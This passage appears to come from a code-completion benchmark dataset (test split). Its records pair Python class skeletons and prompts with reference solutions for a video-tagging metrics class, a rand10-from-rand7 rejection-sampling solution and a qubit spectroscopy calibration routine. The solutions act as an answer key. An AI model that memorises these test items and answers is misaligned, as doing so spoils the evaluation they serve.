self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n<|end_body_2|>\n\n<|body_start_3|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n 
self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n<|end_body_3|>\n", "revision_id": "aa5083f15e68b637403cd96bd43633b93dc59844", "skeleton": "<|skeleton|>\nclass EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.\"\"\"\n <|body_0|>\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n <|body_2|>\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.\"\"\"\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_correlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. 
Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n", "source": "the_stack_v2_python_sparse", "source_path": "utils/train_util.py", "source_repo": "hezhiqian01/MultiModal-Tagging", "split": "test", "star_events_count": 4} {"blob_id": "ee6cf268644065e2e2e4a39c410bdb0ea77118c3", "bodies": ["while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 
10 + 1", "while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1"], "bodies_text": "<|body_start_0|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n <|body_0|>\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000318", "length_bytes": 1066, "license_type": "no_license", "methods": [{"docstring": "拒绝采样", "name": "rand10", "signature": "def rand10(self)"}, {"docstring": "拒绝采样-减少舍弃数字", "name": "rand10_new", "signature": "def rand10_new(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000089", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rand10(self): 拒绝采样\n- def rand10_new(self): 拒绝采样-减少舍弃数字", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rand10(self): 拒绝采样\n- def rand10_new(self): 拒绝采样-减少舍弃数字\n\n<|skeleton|>\nclass Solution:\n\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n <|body_0|>\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num = (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n<|end_body_1|>\n", "revision_id": "52756b30e9d51794591aca030bc918e707f473f1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n <|body_0|>\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def rand10(self):\n \"\"\"拒绝采样\"\"\"\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n\n def rand10_new(self):\n \"\"\"拒绝采样-减少舍弃数字\"\"\"\n while True:\n num = (rand7() - 1) * 7 + rand7()\n if num <= 40:\n return num % 10 + 1\n rand9 = num - 40\n num 
= (rand9 - 1) * 7 + rand7()\n if num <= 60:\n return num % 10 + 1\n rand3 = num - 60\n num = (rand3 - 1) * 7 + rand7()\n if num <= 20:\n return num % 10 + 1\n", "source": "the_stack_v2_python_sparse", "source_path": "470.用 Rand7() 实现 Rand10()/solution.py", "source_repo": "QtTao/daily_leetcode", "split": "test", "star_events_count": 0} {"blob_id": "2b5ff03bc155daaece7585ef8a03299574061b3a", "bodies": ["super().__init__(dev=dev, qubits=qubits, **kw)\nself.index_iteration = 1\nself.index_spectroscopy = 1\nself.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\nself.results = {}\nself.final_init(**kw)", "super().create_routine_template()\nfor i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)", "settings = {'QubitSpectroscopy1D': {'qubits': {}}}\nif self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\nself.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\nself.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)"], "bodies_text": "<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n<|end_body_1|>\n\n<|body_start_2|>\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n<|end_body_2|>\n", "class_docstring": "Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. 
A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp", "class_name": "AdaptiveQubitSpectroscopy", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n <|body_1|>\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. 
qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n<|end_body_1|>\n\n<|body_start_2|>\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000319", "length_bytes": 24662, "license_type": "permissive", "methods": [{"docstring": "Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon", "name": "__init__", "signature": "def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw)"}, {"docstring": "Creates the routine template for the AdaptiveQubitSpectroscopy routine.", "name": "create_routine_template", "signature": "def create_routine_template(self)"}, {"docstring": "Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.", "name": "add_rerun_qubit_spectroscopy_step", "signature": "def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000854", "prompt": "Implement the Python class `AdaptiveQubitSpectroscopy` described below.\n\nClass description:\nRoutine to find the ge transition frequency via qubit spectroscopy. 
A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\n\nMethod signatures and docstrings:\n- def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw): Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\n- def create_routine_template(self): Creates the routine template for the AdaptiveQubitSpectroscopy routine.\n- def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits): Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.", "prompted_full_text": "Implement the Python class `AdaptiveQubitSpectroscopy` described below.\n\nClass description:\nRoutine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\n\nMethod signatures and docstrings:\n- def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw): Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. 
If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\n- def create_routine_template(self): Creates the routine template for the AdaptiveQubitSpectroscopy routine.\n- def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits): Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\n\n<|skeleton|>\nclass AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n <|body_1|>\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. 
qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n<|end_body_1|>\n\n<|body_start_2|>\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n<|end_body_2|>\n", "revision_id": "bc6733d774fe31a23f4c7e73e5eb0beed8d30e7d", "skeleton": "<|skeleton|>\nclass AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. 
max_waiting_secon\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n <|body_1|>\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdaptiveQubitSpectroscopy:\n \"\"\"Routine to find the ge transition frequency via qubit spectroscopy. A series of qubit spectroscopies is performed. A Decision step decides whether a fit failed for some qubits and whether to rerun the spectroscopy for them. The user can specify the number of spectroscopies via the keyword \"n_spectroscopies\" in the configuration parameter dictionary. The settings of each spectroscopy can be specified by using their unique label. For example, a routine with 2 spectroscopies can have the following routine steps: 1) QubitSpectroscopy1DStep (qubit_spectroscopy_): Performs a qubit spectroscopy and fits the result with a Lorentzian to extract the ge transition frequency. 2) Decision (decision_sp\"\"\"\n\n def __init__(self, dev: Device, qubits: List[QuDev_transmon], **kw):\n \"\"\"Initialize the AdaptiveQubitSpectroscopy routine. Args: dev (Device): Device to be used for the routine qubits (list): The qubits which should be calibrated. By default, all qubits of the device are selected. Configuration parameters (coming from the configuration parameter dictionary): n_spectroscopies (int): Number of (successful) spectroscopies that will be run. max_iterations (int): Maximum number of iterations that will be performed if a spectroscopy fails. auto_repetition_settings (bool): Whether the settings of the repeated spectroscopy should be automatically set. If True, the range of the sweep and the density of the sweep points will be doubled at each repetition. max_waiting_secon\"\"\"\n super().__init__(dev=dev, qubits=qubits, **kw)\n self.index_iteration = 1\n self.index_spectroscopy = 1\n self.previous_freqs = {qb.name: qb.ge_freq() for qb in qubits}\n self.results = {}\n self.final_init(**kw)\n\n def create_routine_template(self):\n \"\"\"Creates the routine template for the AdaptiveQubitSpectroscopy routine.\"\"\"\n super().create_routine_template()\n for i in range(self.get_param_value('n_spectroscopies', default=2)):\n qb_spec_settings = {'qubits': self.qubits}\n 